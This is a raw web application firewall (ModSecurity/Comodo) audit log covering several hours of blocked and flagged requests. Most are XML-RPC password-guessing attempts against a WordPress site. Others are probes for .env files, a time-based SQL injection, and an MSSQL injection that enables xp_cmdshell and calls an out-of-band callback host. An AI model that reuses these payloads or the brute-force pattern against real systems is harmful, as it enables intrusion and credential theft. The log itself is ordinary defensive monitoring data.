XML-RPC Attack Identified (CVE-2013-0235)|Source 103.69.98.51 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749130166077864 5122 (- - -) Stopwatch2: 1749130166077864 5122; combined=3837, p1=455, p2=3220, p3=0, p4=0, p5=96, sr=84, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c56cb559-Z-- --249e5422-A-- [05/Jun/2025:20:34:52 +0700] aEGc_FwdJdhOudw5hdwArgAAAIQ 103.236.140.4 34178 103.236.140.4 8181 --249e5422-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.69.98.51 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.69.98.51 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --249e5422-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehBlaise@123# --249e5422-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --249e5422-E-- --249e5422-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.69.98.51 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749130492981342 6265 (- - -) Stopwatch2: 1749130492981342 6265; combined=4368, p1=553, p2=3669, p3=0, p4=0, p5=87, sr=93, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --249e5422-Z-- --f24cf05e-A-- [05/Jun/2025:20:49:50 +0700] aEGgfuth7G2xELALzPZf4wAAAM4 103.236.140.4 34470 103.236.140.4 8181 --f24cf05e-B-- GET /.c9/metadata/environment/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:32.0) Gecko/20100101 Firefox/32.0 Accept-Charset: utf-8 --f24cf05e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f24cf05e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749131390680556 785 (- - -) Stopwatch2: 1749131390680556 785; combined=319, p1=280, p2=0, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f24cf05e-Z-- --fbbcaa7d-A-- [05/Jun/2025:20:58:06 +0700] aEGibuth7G2xELALzPZgAQAAANA 103.236.140.4 34660 103.236.140.4 8181 --fbbcaa7d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 216.55.146.46 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 216.55.146.46 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fbbcaa7d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh.2022 --fbbcaa7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbbcaa7d-E-- --fbbcaa7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 216.55.146.46 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749131886086882 6680 (- - -) Stopwatch2: 1749131886086882 6680; combined=4554, p1=558, p2=3819, p3=0, p4=0, p5=108, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbbcaa7d-Z-- --0fa41816-A-- [05/Jun/2025:20:58:59 +0700] aEGio3-K7ToMdu-YSIJY6gAAAA8 103.236.140.4 34694 103.236.140.4 8181 --0fa41816-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0fa41816-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminrootantixroot --0fa41816-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fa41816-E-- --0fa41816-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749131939005627 4930 (- - -) Stopwatch2: 1749131939005627 4930; combined=3669, p1=406, p2=3094, p3=0, p4=0, p5=100, sr=73, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fa41816-Z-- --3b771201-A-- [05/Jun/2025:21:00:06 +0700] aEGi5irHpfaS2Cuwh8UMOwAAAEI 103.236.140.4 34714 103.236.140.4 8181 --3b771201-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 143.244.185.159 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 143.244.185.159 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3b771201-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh#789 --3b771201-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b771201-E-- --3b771201-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 143.244.185.159 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749132006504163 6412 (- - -) Stopwatch2: 1749132006504163 6412; combined=4563, p1=548, p2=3783, p3=0, p4=0, p5=133, sr=91, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b771201-Z-- --e4f4d835-A-- [05/Jun/2025:21:00:24 +0700] aEGi-H-K7ToMdu-YSIJY8wAAAAQ 103.236.140.4 34718 103.236.140.4 8181 --e4f4d835-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e4f4d835-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix#1 --e4f4d835-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4f4d835-E-- --e4f4d835-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749132024085295 6451 (- - -) Stopwatch2: 1749132024085295 6451; combined=4482, p1=546, p2=3761, p3=0, p4=0, p5=104, sr=95, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4f4d835-Z-- --84ab7c3a-A-- [05/Jun/2025:21:03:49 +0700] aEGjxX-K7ToMdu-YSIJZAAAAABY 103.236.140.4 34804 103.236.140.4 8181 --84ab7c3a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 41.70.100.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 41.70.100.6 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --84ab7c3a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin01* --84ab7c3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84ab7c3a-E-- --84ab7c3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 41.70.100.6 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749132229745389 6440 (- - -) Stopwatch2: 1749132229745389 6440; combined=4500, p1=554, p2=3775, p3=0, p4=0, p5=102, sr=95, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84ab7c3a-Z-- --fe531a1e-A-- [05/Jun/2025:21:08:22 +0700] aEGk1irHpfaS2Cuwh8UMTwAAAE0 103.236.140.4 34860 103.236.140.4 8181 --fe531a1e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fe531a1e-C-- system.multicallmethodNamewp.getUsersBlogsparamscargo2023Cargo2023 --fe531a1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe531a1e-E-- --fe531a1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749132502880919 4762 (- - -) Stopwatch2: 1749132502880919 4762; combined=3819, p1=402, p2=3044, p3=0, p4=0, p5=203, sr=80, sw=170, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe531a1e-Z-- --c024a839-A-- [05/Jun/2025:21:15:08 +0700] aEGmbOth7G2xELALzPZgGQAAAM4 103.236.140.4 34928 103.236.140.4 8181 --c024a839-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c024a839-C-- system.multicallmethodNamewp.getUsersBlogsparamsdextraDextra2019! --c024a839-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c024a839-E-- --c024a839-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749132908929905 5481 (- - -) Stopwatch2: 1749132908929905 5481; combined=4025, p1=490, p2=3362, p3=0, p4=0, p5=102, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c024a839-Z-- --03109f68-A-- [05/Jun/2025:21:17:27 +0700] aEGm91wdJdhOudw5hdwBRwAAAIE 103.236.140.4 36082 103.236.140.4 8181 --03109f68-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 84 User-Agent: WMS/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173686579 --03109f68-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --03109f68-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03109f68-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749133047070655 2585 (- - -) Stopwatch2: 1749133047070655 2585; combined=1435, p1=368, p2=1035, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03109f68-Z-- --6dc76c45-A-- [05/Jun/2025:21:17:27 +0700] aEGm9-th7G2xELALzPZgVQAAAMo 103.236.140.4 36090 103.236.140.4 8181 --6dc76c45-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 773 User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173234464 --6dc76c45-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0us2vpgpeonc6qdbef038y3e4qt1hqif.oast.me'-- --6dc76c45-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dc76c45-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749133047076720 3522 (- - -) Stopwatch2: 1749133047076720 3522; combined=2234, p1=485, p2=1678, p3=21, p4=24, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dc76c45-Z-- --9bc1541d-A-- [05/Jun/2025:21:17:57 +0700] aEGnFeth7G2xELALzPZgbgAAAME 103.236.140.4 36468 103.236.140.4 8181 --9bc1541d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9bc1541d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix1. --9bc1541d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bc1541d-E-- --9bc1541d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749133077681186 4387 (- - -) Stopwatch2: 1749133077681186 4387; combined=3452, p1=379, p2=2890, p3=0, p4=0, p5=105, sr=77, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bc1541d-Z-- --372c241f-A-- [05/Jun/2025:21:24:56 +0700] aEGouH-K7ToMdu-YSIJZxAAAAAI 103.236.140.4 36594 103.236.140.4 8181 --372c241f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --372c241f-C-- system.multicallmethodNamewp.getUsersBlogsparamsAdminantix01 --372c241f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --372c241f-E-- --372c241f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749133496257317 5647 (- - -) Stopwatch2: 1749133496257317 5647; combined=4089, p1=476, p2=3438, p3=0, p4=0, p5=103, sr=91, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --372c241f-Z-- --11191e2e-A-- [05/Jun/2025:21:31:37 +0700] aEGqSVwdJdhOudw5hdwBegAAAIU 103.236.140.4 36682 103.236.140.4 8181 --11191e2e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --11191e2e-C-- system.multicallmethodNamewp.getUsersBlogsparamssolankaSolanka321! --11191e2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11191e2e-E-- --11191e2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749133897535876 5097 (- - -) Stopwatch2: 1749133897535876 5097; combined=3865, p1=457, p2=3239, p3=0, p4=0, p5=99, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11191e2e-Z-- --bb3b6f6c-A-- [05/Jun/2025:21:36:09 +0700] aEGrWX-K7ToMdu-YSIJZ0AAAAAs 103.236.140.4 36750 103.236.140.4 8181 --bb3b6f6c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.200.240.65 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.200.240.65 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bb3b6f6c-C-- system.multicallmethodNamewp.getUsersBlogsparamstest-de-1test --bb3b6f6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb3b6f6c-E-- --bb3b6f6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.200.240.65 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749134169110077 5662 (- - -) Stopwatch2: 1749134169110077 5662; combined=4028, p1=496, p2=3361, p3=0, p4=0, p5=103, sr=94, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb3b6f6c-Z-- --c6ee5a4e-A-- [05/Jun/2025:21:37:29 +0700] aEGrqeth7G2xELALzPZgrAAAAMw 103.236.140.4 36780 103.236.140.4 8181 --c6ee5a4e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.29.219 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.29.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c6ee5a4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6ee5a4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749134249595971 669 (- - -) 